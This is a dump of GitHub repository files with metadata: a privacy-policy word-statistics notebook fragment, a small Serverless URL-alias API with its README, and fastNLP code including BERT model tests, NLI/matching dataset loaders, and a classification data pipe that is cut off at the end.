wordfreq = Counter(ltext.split(\" \"))\n return wordfreq\n\ndef word_stats(wordfreq):\n num_unique = len(wordfreq(ppolicy))\n counts = wordfreq(ppolicy).values()\n ratio = num_unique/sum(counts)\n bullets = ppolicy.count('*')\n complexity = textstat.flesch_reading_ease(ppolicy)\n readability = textstat.text_standard(ppolicy, float_output=False)\n rtimemin = (sum(counts)/250)\n sentiment = sid.polarity_scores(ppolicy)\n \n return ratio\n #return (num_unique, sum(counts), bullets, complexity, readability, rtimemin, sentiment)\n\n\n# In[82]:\n\n\n#load files\nstats_list = []\n\nfiles = glob.glob('/Users/Athena/Desktop/privacypolicies/*.txt')\n\nfor file in files:\n with open(file, \"r\", encoding='utf8', errors = 'ignore') as f:\n ppolicy = f.read()\n stats = word_stats(wordfreq)\n stats_list.append(stats)\n stats_list.append(\"___\")\n print(file)\n\nprint(stats_list)\n \n \n\n\n# In[59]:\n\n\ntext = \"According to the Duolingo privacy policy, shares non-personal data with third party providers which can be linked back to your personal information. Privacy\"\n\n\n# In[60]:\n\n\nword_stats(wordfreq)\n\n\n# In[ ]:\n\n\n\n\n" } ]
1
PatrickMcGrath29/utilities
https://github.com/PatrickMcGrath29/utilities
2373e69a48bb82347436f4b9b8425f4e8baa1bad
610e26c47556a3b2ef20582efd9be85e231a28bc
b4ba19091bb8b2fa337c7fa76cdb2b5f6af10d7b
refs/heads/master
2022-12-19T06:35:33.994058
2020-09-20T01:16:38
2020-09-20T01:16:38
296,939,572
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6907630562782288, "alphanum_fraction": 0.7148594260215759, "avg_line_length": 14.625, "blob_id": "2ebc8f7d063eb0a871d54d4dd1d2361e4a118f9e", "content_id": "6ac83547e52925a085ffa6e60502bb5b1d78ab07", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 249, "license_type": "no_license", "max_line_length": 41, "num_lines": 16, "path": "/README.md", "repo_name": "PatrickMcGrath29/utilities", "src_encoding": "UTF-8", "text": "# Stella\n\n## Usage Instructions\n\n### Local Dev Setup\n\n Python Environment\n- `pyenv install 3.8.0`, if not installed\n- `pyenv virtualenv 3.8.0 stella`\n- `pyenv local stella`\n\nServerless\n- `brew install serverless`\n\n### Deploying\n- `serverless deploy`" }, { "alpha_fraction": 0.6228968501091003, "alphanum_fraction": 0.6276518106460571, "avg_line_length": 23.401784896850586, "blob_id": "62324c70fe253b1318a9a8f434c5bb3b366c80ae", "content_id": "95fdb19533327d29d75588feaea0369e6d711dfc", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2734, "license_type": "no_license", "max_line_length": 89, "num_lines": 112, "path": "/stella/api.py", "repo_name": "PatrickMcGrath29/utilities", "src_encoding": "UTF-8", "text": "from __future__ import annotations\n\nimport json\nimport os\nimport secrets\nfrom datetime import datetime\n\nimport boto3\n\ndynamodb = boto3.resource('dynamodb')\n\n\ndef create(event, context):\n data = json.loads(event['body'])\n\n if 'alias' not in data or 'full_url' not in data:\n return invalid_request_response()\n\n # TODO: Handle overwriting and duplicates\n saved_alias = Alias(data['alias'], data['full_url']).save()\n return success_response(saved_alias)\n\n\ndef get(event, context):\n alias = Alias.get(event['pathParameters']['id'])\n\n if alias is None:\n return not_found_response()\n else:\n return success_response(alias)\n\n\ndef delete(event, context):\n alias = event['pathParameters']['id']\n secret_id = event['queryStringParameters'].get('secret_id')\n\n if secret_id is None:\n return invalid_request_response('A secret ID must be included.')\n\n success = Alias.delete(alias, secret_id)\n\n if success:\n return success_response({})\n else:\n return not_found_response()\n\n\ndef invalid_request_response(message=None):\n return {'statusCode': 400, 'message': message or 'Bad Request'}\n\n\ndef not_found_response():\n return {'statusCode': 404, 'message': 'Not Found'}\n\n\ndef success_response(body):\n return {'statusCode': 200, 'body': body}\n\n\nclass DynamoClient:\n def __init__(self, table_name: str):\n self.table = dynamodb.Table(table_name)\n\n def get(self, keys: dict) -> dict:\n return self.table.get_item(Key=keys)\n\n def save(self, item: dict) -> dict:\n return self.table.put_item(Item=item)\n\n def delete(self, keys: dict) -> bool:\n return self.table.delete_item(Key=keys)\n\n\nclass Alias:\n TABLE_NAME = os.environ['STELLA_DYNAMODB_TABLE']\n\n def __init__(self, alias, full_url):\n self.alias = alias\n self.full_url = full_url\n\n def serialize(self) -> dict:\n return {\n 'alias': self.alias,\n 'full_url': self.full_url\n }\n\n def save(self) -> dict:\n alias = self.serialize().update({\n 'secret_id': self.generate_secret_id(),\n 'created_date': datetime.utcnow()\n })\n DynamoClient(self.TABLE_NAME).save(alias)\n return alias\n\n @classmethod\n def get(cls, alias: str) -> dict:\n response = DynamoClient(cls.TABLE_NAME).get({'id': alias})\n return response\n # return cls(response)\n\n @classmethod\n def delete(cls, alias: str, secret_id: str) -> bool:\n return DynamoClient(cls.TABLE_NAME).delete({'id': alias, 'secret_id': secret_id})\n\n @staticmethod\n def generate_secret_id():\n secrets.token_urlsafe(16)\n\n\n# -- Model --\n# database operations\n# validation (serialization)\n\n" } ]
2
brxx122/fastNLP
https://github.com/brxx122/fastNLP
625dbaccb37fc72aabe4612ba5c6349504418381
8affc4a3ff75061ccbdecca6247493f346634155
98a89eff1b535a83fdff144213d7d386f7d39047
refs/heads/master
2020-04-18T13:49:43.669692
2019-09-18T06:01:30
2019-09-18T06:01:30
167,572,020
0
2
Apache-2.0
2019-01-25T15:49:43
2019-09-16T07:00:36
2019-09-17T06:22:19
Python
[ { "alpha_fraction": 0.5869376063346863, "alphanum_fraction": 0.602177083492279, "avg_line_length": 38.59195327758789, "blob_id": "3509938f31c0c20c842910fe6b56e28ac2a9b4f2", "content_id": "9cab3a88bd78dc7f461d52c43800078d611750a2", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6890, "license_type": "permissive", "max_line_length": 98, "num_lines": 174, "path": "/test/models/test_bert.py", "repo_name": "brxx122/fastNLP", "src_encoding": "UTF-8", "text": "import unittest\n\nimport torch\n\nfrom fastNLP.core import Vocabulary, Const\nfrom fastNLP.models.bert import BertForSequenceClassification, BertForQuestionAnswering, \\\n BertForTokenClassification, BertForMultipleChoice, BertForSentenceMatching\nfrom fastNLP.embeddings.bert_embedding import BertEmbedding\n\n\nclass TestBert(unittest.TestCase):\n def test_bert_1(self):\n vocab = Vocabulary().add_word_lst(\"this is a test .\".split())\n embed = BertEmbedding(vocab, model_dir_or_name='test/data_for_tests/embedding/small_bert',\n include_cls_sep=True)\n\n model = BertForSequenceClassification(embed, 2)\n\n input_ids = torch.LongTensor([[1, 2, 3], [5, 6, 0]])\n\n pred = model(input_ids)\n self.assertTrue(isinstance(pred, dict))\n self.assertTrue(Const.OUTPUT in pred)\n self.assertEqual(tuple(pred[Const.OUTPUT].shape), (2, 2))\n\n pred = model(input_ids)\n self.assertTrue(isinstance(pred, dict))\n self.assertTrue(Const.OUTPUT in pred)\n self.assertEqual(tuple(pred[Const.OUTPUT].shape), (2, 2))\n\n def test_bert_1_w(self):\n vocab = Vocabulary().add_word_lst(\"this is a test .\".split())\n embed = BertEmbedding(vocab, model_dir_or_name='test/data_for_tests/embedding/small_bert',\n include_cls_sep=False)\n\n with self.assertWarns(Warning):\n model = BertForSequenceClassification(embed, 2)\n\n input_ids = torch.LongTensor([[1, 2, 3], [5, 6, 0]])\n\n pred = model.predict(input_ids)\n self.assertTrue(isinstance(pred, dict))\n self.assertTrue(Const.OUTPUT in pred)\n self.assertEqual(tuple(pred[Const.OUTPUT].shape), (2,))\n\n def test_bert_2(self):\n\n vocab = Vocabulary().add_word_lst(\"this is a test [SEP] .\".split())\n embed = BertEmbedding(vocab, model_dir_or_name='test/data_for_tests/embedding/small_bert',\n include_cls_sep=True)\n\n model = BertForMultipleChoice(embed, 2)\n\n input_ids = torch.LongTensor([[[2, 6, 7], [1, 6, 5]]])\n print(input_ids.size())\n\n pred = model(input_ids)\n self.assertTrue(isinstance(pred, dict))\n self.assertTrue(Const.OUTPUT in pred)\n self.assertEqual(tuple(pred[Const.OUTPUT].shape), (1, 2))\n\n def test_bert_2_w(self):\n\n vocab = Vocabulary().add_word_lst(\"this is a test [SEP] .\".split())\n embed = BertEmbedding(vocab, model_dir_or_name='test/data_for_tests/embedding/small_bert',\n include_cls_sep=False)\n\n with self.assertWarns(Warning):\n model = BertForMultipleChoice(embed, 2)\n\n input_ids = torch.LongTensor([[[2, 6, 7], [1, 6, 5]]])\n print(input_ids.size())\n\n pred = model.predict(input_ids)\n self.assertTrue(isinstance(pred, dict))\n self.assertTrue(Const.OUTPUT in pred)\n self.assertEqual(tuple(pred[Const.OUTPUT].shape), (1,))\n\n def test_bert_3(self):\n\n vocab = Vocabulary().add_word_lst(\"this is a test [SEP] .\".split())\n embed = BertEmbedding(vocab, model_dir_or_name='test/data_for_tests/embedding/small_bert',\n include_cls_sep=False)\n model = BertForTokenClassification(embed, 7)\n\n input_ids = torch.LongTensor([[1, 2, 3], [6, 5, 0]])\n\n pred = model(input_ids)\n self.assertTrue(isinstance(pred, dict))\n self.assertTrue(Const.OUTPUT in pred)\n self.assertEqual(tuple(pred[Const.OUTPUT].shape), (2, 3, 7))\n\n def test_bert_3_w(self):\n\n vocab = Vocabulary().add_word_lst(\"this is a test [SEP] .\".split())\n embed = BertEmbedding(vocab, model_dir_or_name='test/data_for_tests/embedding/small_bert',\n include_cls_sep=True)\n\n with self.assertWarns(Warning):\n model = BertForTokenClassification(embed, 7)\n\n input_ids = torch.LongTensor([[1, 2, 3], [6, 5, 0]])\n\n pred = model.predict(input_ids)\n self.assertTrue(isinstance(pred, dict))\n self.assertTrue(Const.OUTPUT in pred)\n self.assertEqual(tuple(pred[Const.OUTPUT].shape), (2, 3))\n\n def test_bert_4(self):\n\n vocab = Vocabulary().add_word_lst(\"this is a test [SEP] .\".split())\n embed = BertEmbedding(vocab, model_dir_or_name='test/data_for_tests/embedding/small_bert',\n include_cls_sep=True)\n model = BertForQuestionAnswering(embed)\n\n input_ids = torch.LongTensor([[1, 2, 3], [6, 5, 0]])\n\n pred = model(input_ids)\n self.assertTrue(isinstance(pred, dict))\n self.assertTrue(Const.OUTPUTS(0) in pred)\n self.assertTrue(Const.OUTPUTS(1) in pred)\n self.assertEqual(tuple(pred[Const.OUTPUTS(0)].shape), (2, 5))\n self.assertEqual(tuple(pred[Const.OUTPUTS(1)].shape), (2, 5))\n\n model = BertForQuestionAnswering(embed, 7)\n pred = model(input_ids)\n self.assertTrue(isinstance(pred, dict))\n self.assertEqual(len(pred), 7)\n\n def test_bert_4_w(self):\n\n vocab = Vocabulary().add_word_lst(\"this is a test [SEP] .\".split())\n embed = BertEmbedding(vocab, model_dir_or_name='test/data_for_tests/embedding/small_bert',\n include_cls_sep=False)\n\n with self.assertWarns(Warning):\n model = BertForQuestionAnswering(embed)\n\n input_ids = torch.LongTensor([[1, 2, 3], [6, 5, 0]])\n\n pred = model.predict(input_ids)\n self.assertTrue(isinstance(pred, dict))\n self.assertTrue(Const.OUTPUTS(1) in pred)\n self.assertEqual(tuple(pred[Const.OUTPUTS(1)].shape), (2,))\n\n def test_bert_5(self):\n\n vocab = Vocabulary().add_word_lst(\"this is a test [SEP] .\".split())\n embed = BertEmbedding(vocab, model_dir_or_name='test/data_for_tests/embedding/small_bert',\n include_cls_sep=True)\n model = BertForSentenceMatching(embed)\n\n input_ids = torch.LongTensor([[1, 2, 3], [6, 5, 0]])\n\n pred = model(input_ids)\n self.assertTrue(isinstance(pred, dict))\n self.assertTrue(Const.OUTPUT in pred)\n self.assertEqual(tuple(pred[Const.OUTPUT].shape), (2, 2))\n\n def test_bert_5_w(self):\n\n vocab = Vocabulary().add_word_lst(\"this is a test [SEP] .\".split())\n embed = BertEmbedding(vocab, model_dir_or_name='test/data_for_tests/embedding/small_bert',\n include_cls_sep=False)\n\n with self.assertWarns(Warning):\n model = BertForSentenceMatching(embed)\n\n input_ids = torch.LongTensor([[1, 2, 3], [6, 5, 0]])\n\n pred = model.predict(input_ids)\n self.assertTrue(isinstance(pred, dict))\n self.assertTrue(Const.OUTPUT in pred)\n self.assertEqual(tuple(pred[Const.OUTPUT].shape), (2,))\n\n" }, { "alpha_fraction": 0.49177631735801697, "alphanum_fraction": 0.5049341917037964, "avg_line_length": 31.401254653930664, "blob_id": "5d4b273f33d81c43c25ab7e6a1b0c6ae16bad519", "content_id": "b713fc9afaf67ec0a030bbebfa17a85b2963602d", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 10944, "license_type": "permissive", "max_line_length": 109, "num_lines": 319, "path": "/fastNLP/io/loader/matching.py", "repo_name": "brxx122/fastNLP", "src_encoding": "UTF-8", "text": "\"\"\"undocumented\"\"\"\n\n__all__ = [\n \"MNLILoader\",\n \"SNLILoader\",\n \"QNLILoader\",\n \"RTELoader\",\n \"QuoraLoader\",\n]\n\nimport os\nimport warnings\nfrom typing import Union, Dict\n\nfrom .json import JsonLoader\nfrom .loader import Loader\nfrom .. import DataBundle\nfrom ...core.const import Const\nfrom ...core.dataset import DataSet\nfrom ...core.instance import Instance\n\n\nclass MNLILoader(Loader):\n \"\"\"\n 读取MNLI任务的数据,读取之后的DataSet中包含以下的内容,words0是sentence1, words1是sentence2, target是gold_label, 测试集中没\n 有target列。\n\n .. csv-table::\n :header: \"raw_words1\", \"raw_words2\", \"target\"\n\n \"The new rights are...\", \"Everyone really likes..\", \"neutral\"\n \"This site includes a...\", \"The Government Executive...\", \"contradiction\"\n \"...\", \"...\",\".\"\n\n \"\"\"\n \n def __init__(self):\n super().__init__()\n \n def _load(self, path: str):\n ds = DataSet()\n with open(path, 'r', encoding='utf-8') as f:\n f.readline() # 跳过header\n if path.endswith(\"test_matched.tsv\") or path.endswith('test_mismatched.tsv'):\n warnings.warn(\"RTE's test file has no target.\")\n for line in f:\n line = line.strip()\n if line:\n parts = line.split('\\t')\n raw_words1 = parts[8]\n raw_words2 = parts[9]\n if raw_words1 and raw_words2:\n ds.append(Instance(raw_words1=raw_words1, raw_words2=raw_words2))\n else:\n for line in f:\n line = line.strip()\n if line:\n parts = line.split('\\t')\n raw_words1 = parts[8]\n raw_words2 = parts[9]\n target = parts[-1]\n if raw_words1 and raw_words2 and target:\n ds.append(Instance(raw_words1=raw_words1, raw_words2=raw_words2, target=target))\n return ds\n \n def load(self, paths: str = None):\n \"\"\"\n\n :param str paths: 传入数据所在目录,会在该目录下寻找dev_matched.tsv, dev_mismatched.tsv, test_matched.tsv,\n test_mismatched.tsv, train.tsv文件夹\n :return: DataBundle\n \"\"\"\n if paths:\n paths = os.path.abspath(os.path.expanduser(paths))\n else:\n paths = self.download()\n if not os.path.isdir(paths):\n raise NotADirectoryError(f\"{paths} is not a valid directory.\")\n \n files = {'dev_matched': \"dev_matched.tsv\",\n \"dev_mismatched\": \"dev_mismatched.tsv\",\n \"test_matched\": \"test_matched.tsv\",\n \"test_mismatched\": \"test_mismatched.tsv\",\n \"train\": 'train.tsv'}\n \n datasets = {}\n for name, filename in files.items():\n filepath = os.path.join(paths, filename)\n if not os.path.isfile(filepath):\n if 'test' not in name:\n raise FileNotFoundError(f\"{name} not found in directory {filepath}.\")\n datasets[name] = self._load(filepath)\n \n data_bundle = DataBundle(datasets=datasets)\n \n return data_bundle\n \n def download(self):\n \"\"\"\n 如果你使用了这个数据,请引用\n\n https://www.nyu.edu/projects/bowman/multinli/paper.pdf\n :return:\n \"\"\"\n output_dir = self._get_dataset_path('mnli')\n return output_dir\n\n\nclass SNLILoader(JsonLoader):\n \"\"\"\n 读取之后的DataSet中的field情况为\n\n .. csv-table:: 下面是使用SNLILoader加载的DataSet所具备的field\n :header: \"raw_words1\", \"raw_words2\", \"target\"\n\n \"The new rights are...\", \"Everyone really likes..\", \"neutral\"\n \"This site includes a...\", \"The Government Executive...\", \"entailment\"\n \"...\", \"...\", \".\"\n\n \"\"\"\n \n def __init__(self):\n super().__init__(fields={\n 'sentence1': Const.RAW_WORDS(0),\n 'sentence2': Const.RAW_WORDS(1),\n 'gold_label': Const.TARGET,\n })\n \n def load(self, paths: Union[str, Dict[str, str]] = None) -> DataBundle:\n \"\"\"\n 从指定一个或多个路径中的文件中读取数据,返回 :class:`~fastNLP.io.DataBundle` 。\n\n 读取的field根据ConllLoader初始化时传入的headers决定。\n\n :param str paths: 传入一个目录, 将在该目录下寻找snli_1.0_train.jsonl, snli_1.0_dev.jsonl\n 和snli_1.0_test.jsonl三个文件。\n\n :return: 返回的:class:`~fastNLP.io.DataBundle`\n \"\"\"\n _paths = {}\n if paths is None:\n paths = self.download()\n if paths:\n if os.path.isdir(paths):\n if not os.path.isfile(os.path.join(paths, 'snli_1.0_train.jsonl')):\n raise FileNotFoundError(f\"snli_1.0_train.jsonl is not found in {paths}\")\n _paths['train'] = os.path.join(paths, 'snli_1.0_train.jsonl')\n for filename in ['snli_1.0_dev.jsonl', 'snli_1.0_test.jsonl']:\n filepath = os.path.join(paths, filename)\n _paths[filename.split('_')[-1].split('.')[0]] = filepath\n paths = _paths\n else:\n raise NotADirectoryError(f\"{paths} is not a valid directory.\")\n \n datasets = {name: self._load(path) for name, path in paths.items()}\n data_bundle = DataBundle(datasets=datasets)\n return data_bundle\n \n def download(self):\n \"\"\"\n 如果您的文章使用了这份数据,请引用\n\n http://nlp.stanford.edu/pubs/snli_paper.pdf\n\n :return: str\n \"\"\"\n return self._get_dataset_path('snli')\n\n\nclass QNLILoader(JsonLoader):\n \"\"\"\n QNLI数据集的Loader,\n 加载的DataSet将具备以下的field, raw_words1是question, raw_words2是sentence, target是label\n\n .. csv-table::\n :header: \"raw_words1\", \"raw_words2\", \"target\"\n\n \"What came into force after the new...\", \"As of that day...\", \"entailment\"\n \"What is the first major...\", \"The most important tributaries\", \"not_entailment\"\n \"...\",\".\"\n\n test数据集没有target列\n\n \"\"\"\n \n def __init__(self):\n super().__init__()\n \n def _load(self, path):\n ds = DataSet()\n \n with open(path, 'r', encoding='utf-8') as f:\n f.readline() # 跳过header\n if path.endswith(\"test.tsv\"):\n warnings.warn(\"QNLI's test file has no target.\")\n for line in f:\n line = line.strip()\n if line:\n parts = line.split('\\t')\n raw_words1 = parts[1]\n raw_words2 = parts[2]\n if raw_words1 and raw_words2:\n ds.append(Instance(raw_words1=raw_words1, raw_words2=raw_words2))\n else:\n for line in f:\n line = line.strip()\n if line:\n parts = line.split('\\t')\n raw_words1 = parts[1]\n raw_words2 = parts[2]\n target = parts[-1]\n if raw_words1 and raw_words2 and target:\n ds.append(Instance(raw_words1=raw_words1, raw_words2=raw_words2, target=target))\n return ds\n \n def download(self):\n \"\"\"\n 如果您的实验使用到了该数据,请引用\n\n .. todo::\n 补充\n\n :return:\n \"\"\"\n return self._get_dataset_path('qnli')\n\n\nclass RTELoader(Loader):\n \"\"\"\n RTE数据的loader\n 加载的DataSet将具备以下的field, raw_words1是sentence0,raw_words2是sentence1, target是label\n\n .. csv-table::\n :header: \"raw_words1\", \"raw_words2\", \"target\"\n\n \"Dana Reeve, the widow of the actor...\", \"Christopher Reeve had an...\", \"not_entailment\"\n \"Yet, we now are discovering that...\", \"Bacteria is winning...\", \"entailment\"\n \"...\",\".\"\n\n test数据集没有target列\n \"\"\"\n \n def __init__(self):\n super().__init__()\n \n def _load(self, path: str):\n ds = DataSet()\n \n with open(path, 'r', encoding='utf-8') as f:\n f.readline() # 跳过header\n if path.endswith(\"test.tsv\"):\n warnings.warn(\"RTE's test file has no target.\")\n for line in f:\n line = line.strip()\n if line:\n parts = line.split('\\t')\n raw_words1 = parts[1]\n raw_words2 = parts[2]\n if raw_words1 and raw_words2:\n ds.append(Instance(raw_words1=raw_words1, raw_words2=raw_words2))\n else:\n for line in f:\n line = line.strip()\n if line:\n parts = line.split('\\t')\n raw_words1 = parts[1]\n raw_words2 = parts[2]\n target = parts[-1]\n if raw_words1 and raw_words2 and target:\n ds.append(Instance(raw_words1=raw_words1, raw_words2=raw_words2, target=target))\n return ds\n \n def download(self):\n return self._get_dataset_path('rte')\n\n\nclass QuoraLoader(Loader):\n \"\"\"\n Quora matching任务的数据集Loader\n\n 支持读取的文件中的内容,应该有以下的形式, 以制表符分隔,且前三列的内容必须是:第一列是label,第二列和第三列是句子\n\n Example::\n\n 1\tHow do I get funding for my web based startup idea ?\tHow do I get seed funding pre product ?\t327970\n 1\tHow can I stop my depression ?\tWhat can I do to stop being depressed ?\t339556\n ...\n\n 加载的DataSet将具备以下的field\n\n .. csv-table::\n :header: \"raw_words1\", \"raw_words2\", \"target\"\n\n \"What should I do to avoid...\", \"1\"\n \"How do I not sleep in a boring class...\", \"0\"\n \"...\",\".\"\n\n \"\"\"\n \n def __init__(self):\n super().__init__()\n \n def _load(self, path: str):\n ds = DataSet()\n \n with open(path, 'r', encoding='utf-8') as f:\n for line in f:\n line = line.strip()\n if line:\n parts = line.split('\\t')\n raw_words1 = parts[1]\n raw_words2 = parts[2]\n target = parts[0]\n if raw_words1 and raw_words2 and target:\n ds.append(Instance(raw_words1=raw_words1, raw_words2=raw_words2, target=target))\n return ds\n \n def download(self):\n raise RuntimeError(\"Quora cannot be downloaded automatically.\")\n" }, { "alpha_fraction": 0.6082345843315125, "alphanum_fraction": 0.62195885181427, "avg_line_length": 16.06382942199707, "blob_id": "03f35198b98a66ccf76f4f0210623c07e4431934", "content_id": "c8b3dfaac7e7ef52d31e916166944029b065d3cd", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1727, "license_type": "permissive", "max_line_length": 67, "num_lines": 94, "path": "/fastNLP/io/__init__.py", "repo_name": "brxx122/fastNLP", "src_encoding": "UTF-8", "text": "\"\"\"\n用于IO的模块, 具体包括:\n\n1. 用于读入 embedding 的 :doc:`EmbedLoader <fastNLP.io.embed_loader>` 类,\n\n2. 用于读入不同格式数据的 :doc:`Loader <fastNLP.io.loader>` 类\n\n3. 用于处理读入数据的 :doc:`Pipe <fastNLP.io.pipe>` 类\n\n4. 用于保存和载入模型的类, 参考 :doc:`model_io文档</fastNLP.io.model_io>`\n\n这些类的使用方法如下:\n\"\"\"\n__all__ = [\n 'DataBundle',\n \n 'EmbedLoader',\n \n 'Loader',\n \n 'YelpLoader',\n 'YelpFullLoader',\n 'YelpPolarityLoader',\n 'IMDBLoader',\n 'SSTLoader',\n 'SST2Loader',\n \"ChnSentiCorpLoader\",\n\n 'ConllLoader',\n 'Conll2003Loader',\n 'Conll2003NERLoader',\n 'OntoNotesNERLoader',\n 'CTBLoader',\n \"MsraNERLoader\",\n \"WeiboNERLoader\",\n \"PeopleDailyNERLoader\",\n\n 'CSVLoader',\n 'JsonLoader',\n\n 'CWSLoader',\n\n 'MNLILoader',\n \"QuoraLoader\",\n \"SNLILoader\",\n \"QNLILoader\",\n \"RTELoader\",\n\n \"Pipe\",\n\n \"YelpFullPipe\",\n \"YelpPolarityPipe\",\n \"SSTPipe\",\n \"SST2Pipe\",\n \"IMDBPipe\",\n \"ChnSentiCorpPipe\",\n\n \"Conll2003Pipe\",\n \"Conll2003NERPipe\",\n \"OntoNotesNERPipe\",\n \"MsraNERPipe\",\n \"PeopleDailyPipe\",\n \"WeiboNERPipe\",\n\n \"CWSPipe\",\n\n \"MatchingBertPipe\",\n \"RTEBertPipe\",\n \"SNLIBertPipe\",\n \"QuoraBertPipe\",\n \"QNLIBertPipe\",\n \"MNLIBertPipe\",\n \"MatchingPipe\",\n \"RTEPipe\",\n \"SNLIPipe\",\n \"QuoraPipe\",\n \"QNLIPipe\",\n \"MNLIPipe\",\n\n 'ModelLoader',\n 'ModelSaver',\n\n]\n\nfrom .embed_loader import EmbedLoader\nfrom .data_bundle import DataBundle\nfrom .model_io import ModelLoader, ModelSaver\n\nfrom .loader import *\nfrom .pipe import *\n\nimport sys\nfrom ..doc_utils import doc_process\ndoc_process(sys.modules[__name__])" }, { "alpha_fraction": 0.766968309879303, "alphanum_fraction": 0.7873303294181824, "avg_line_length": 72.5, "blob_id": "a74ef409d3e89df60e10df8873a24ce417b5dcfe", "content_id": "3ef9b5a809cacc2d73cacd6f91832325ac9f3b01", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 442, "license_type": "permissive", "max_line_length": 352, "num_lines": 6, "path": "/docs/source/fastNLP.io.pipe.rst", "repo_name": "brxx122/fastNLP", "src_encoding": "UTF-8", "text": "fastNLP.io.pipe\n===============\n\n.. automodule:: fastNLP.io.pipe\n :members: Pipe, CWSPipe, YelpFullPipe, YelpPolarityPipe, SSTPipe, SST2Pipe, IMDBPipe, ChnSentiCorpPipe, Conll2003NERPipe, OntoNotesNERPipe, MsraNERPipe, WeiboNERPipe, PeopleDailyPipe, Conll2003Pipe, MatchingBertPipe, RTEBertPipe, SNLIBertPipe, QuoraBertPipe, QNLIBertPipe, MNLIBertPipe, MatchingPipe, RTEPipe, SNLIPipe, QuoraPipe, QNLIPipe, MNLIPipe\n :inherited-members:\n\n" }, { "alpha_fraction": 0.5475024580955505, "alphanum_fraction": 0.5577864646911621, "avg_line_length": 34.98181915283203, "blob_id": "1e5206dae38917589d0156866f4fe2f556261abf", "content_id": "1ae3089c9597cfd4dc5b30e19bd0b44c2f82449f", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2042, "license_type": "permissive", "max_line_length": 80, "num_lines": 55, "path": "/test/io/pipe/test_extcnndm.py", "repo_name": "brxx122/fastNLP", "src_encoding": "UTF-8", "text": "#!/usr/bin/python\r\n# -*- coding: utf-8 -*-\r\n\r\n# __author__=\"Danqing Wang\"\r\n\r\n#\r\n# Licensed under the Apache License, Version 2.0 (the \"License\");\r\n# you may not use this file except in compliance with the License.\r\n# You may obtain a copy of the License at\r\n#\r\n# http://www.apache.org/licenses/LICENSE-2.0\r\n#\r\n# Unless required by applicable law or agreed to in writing, software\r\n# distributed under the License is distributed on an \"AS IS\" BASIS,\r\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\r\n# See the License for the specific language governing permissions and\r\n# limitations under the License.\r\n# ==============================================================================\r\n\r\nimport unittest\r\nimport os\r\n# import sys\r\n#\r\n# sys.path.append(\"../../../\")\r\n\r\nfrom fastNLP.io import DataBundle\r\nfrom fastNLP.io.pipe.summarization import ExtCNNDMPipe\r\n\r\nclass TestRunExtCNNDMPipe(unittest.TestCase):\r\n\r\n def test_load(self):\r\n data_set_dict = {\r\n 'CNNDM': {\"train\": 'test/data_for_tests/cnndm.jsonl'},\r\n }\r\n vocab_size = 100000\r\n VOCAL_FILE = 'test/data_for_tests/cnndm.vocab'\r\n sent_max_len = 100\r\n doc_max_timesteps = 50\r\n dbPipe = ExtCNNDMPipe(vocab_size=vocab_size,\r\n vocab_path=VOCAL_FILE,\r\n sent_max_len=sent_max_len,\r\n doc_max_timesteps=doc_max_timesteps)\r\n dbPipe2 = ExtCNNDMPipe(vocab_size=vocab_size,\r\n vocab_path=VOCAL_FILE,\r\n sent_max_len=sent_max_len,\r\n doc_max_timesteps=doc_max_timesteps,\r\n domain=True)\r\n for k, v in data_set_dict.items():\r\n db = dbPipe.process_from_file(v)\r\n db2 = dbPipe2.process_from_file(v)\r\n\r\n # print(db2.get_dataset(\"train\"))\r\n\r\n self.assertTrue(isinstance(db, DataBundle))\r\n self.assertTrue(isinstance(db2, DataBundle))\r\n\r\n\r\n\r\n\r\n" }, { "alpha_fraction": 0.5386495590209961, "alphanum_fraction": 0.5523983836174011, "avg_line_length": 32.68610763549805, "blob_id": "538151711914c1d7691297db8e965839f0ae3b08", "content_id": "b1d150aa5f03e356b999c0d7a3abebd3ed542232", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 21680, "license_type": "permissive", "max_line_length": 116, "num_lines": 583, "path": "/fastNLP/io/pipe/classification.py", "repo_name": "brxx122/fastNLP", "src_encoding": "UTF-8", "text": "\"\"\"undocumented\"\"\"\n\n__all__ = [\n \"YelpFullPipe\",\n \"YelpPolarityPipe\",\n \"SSTPipe\",\n \"SST2Pipe\",\n 'IMDBPipe',\n \"ChnSentiCorpPipe\"\n]\n\nimport re\nimport warnings\n\nfrom nltk import Tree\n\nfrom .pipe import Pipe\nfrom .utils import get_tokenizer, _indexize, _add_words_field, _drop_empty_instance, _add_chars_field\nfrom ..data_bundle import DataBundle\nfrom ..loader.classification import ChnSentiCorpLoader\nfrom ..loader.classification import IMDBLoader, YelpFullLoader, SSTLoader, SST2Loader, YelpPolarityLoader\nfrom ...core.const import Const\nfrom ...core.dataset import DataSet\nfrom ...core.instance import Instance\nfrom ...core.vocabulary import Vocabulary\nfrom ...core._logger import logger\n\nnonalpnum = re.compile('[^0-9a-zA-Z?!\\']+')\n\n\nclass _CLSPipe(Pipe):\n \"\"\"\n 分类问题的基类,负责对classification的数据进行tokenize操作。默认是对raw_words列操作,然后生成words列\n\n \"\"\"\n \n def __init__(self, tokenizer: str = 'spacy', lang='en'):\n \n self.tokenizer = get_tokenizer(tokenizer, lang=lang)\n \n def _tokenize(self, data_bundle, field_name=Const.INPUT, new_field_name=None):\n \"\"\"\n 将DataBundle中的数据进行tokenize\n\n :param DataBundle data_bundle:\n :param str field_name:\n :param str new_field_name:\n :return: 传入的DataBundle对象\n \"\"\"\n new_field_name = new_field_name or field_name\n for name, dataset in data_bundle.datasets.items():\n dataset.apply_field(self.tokenizer, field_name=field_name, new_field_name=new_field_name)\n \n return data_bundle\n \n def _granularize(self, data_bundle, tag_map):\n \"\"\"\n 该函数对data_bundle中'target'列中的内容进行转换。\n\n :param data_bundle:\n :param dict tag_map: 将target列中的tag做以下的映射,比如{\"0\":0, \"1\":0, 